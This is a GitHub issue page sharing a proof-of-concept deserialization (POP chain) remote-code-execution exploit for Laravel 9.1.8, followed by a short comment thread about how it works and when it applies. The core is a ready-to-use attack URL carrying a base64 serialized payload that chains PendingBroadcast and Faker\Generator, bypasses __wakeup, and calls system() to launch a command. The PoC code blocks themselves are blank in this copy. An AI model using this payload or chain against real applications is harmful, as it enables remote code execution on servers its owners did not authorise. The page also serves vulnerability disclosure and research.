-
Notifications
You must be signed in to change notification settings - Fork 5
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Laravel 9.1.8 POP chain3 #3
Comments
@1nhann Thank you for sharing this POP chain, Similar to Laravel/RCE1 but your trick ( |
Yes , it is based on Laravel/RCE1 , and what I did is just bypassing the __wakeup |
can somebody tell me where i can find documentation on pop chain attacks like this one? |
Is this the same pop chain vuln that is only an issue if you pass unserialized user input directly into the function then? |
Hello @jwjenkin, All POP chains are security issues if we pass untrusted user input to the PHP<8 has no active support and only receives security updates. PHP versions |
Laravel 9.1.8 POP chain3
Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in (1)
__destruct
in Illuminate\Broadcasting\PendingBroadcast.php .(2)__call
in Faker\Generator.php . This poc bypasses__wakeup
inFaker\Generator.php
: https://inhann.top/2022/05/17/bypass_wakeup/build a route to test:
routes/web.php
:poc
result :
attack
http://127.0.0.1/?ser=TzozNzoiU3ltZm9ueVxDb21wb25lbnRcTWltZVxQYXJ0XFNNaW1lUGFydCI6Mzp7czo0OToiAFN5bWZvbnlcQ29tcG9uZW50XE1pbWVcUGFydFxBYnN0cmFjdFBhcnQAaGVhZGVycyI7TjtzOjExOiIAKgBfaGVhZGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fXM6NjoiaW5oYW5uIjtPOjQwOiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xQZW5kaW5nQnJvYWRjYXN0IjoyOntzOjU6ImV2ZW50IjtzOjg6ImNhbGMuZXhlIjtzOjY6ImV2ZW50cyI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjozOntzOjEyOiIAKgBwcm92aWRlcnMiO2E6MDp7fXM6MTM6IgAqAGZvcm1hdHRlcnMiO1I6MjtzOjk6ImZvcm1hdHRlciI7czo4OiJkaXNwYXRjaCI7fX19
The text was updated successfully, but these errors were encountered: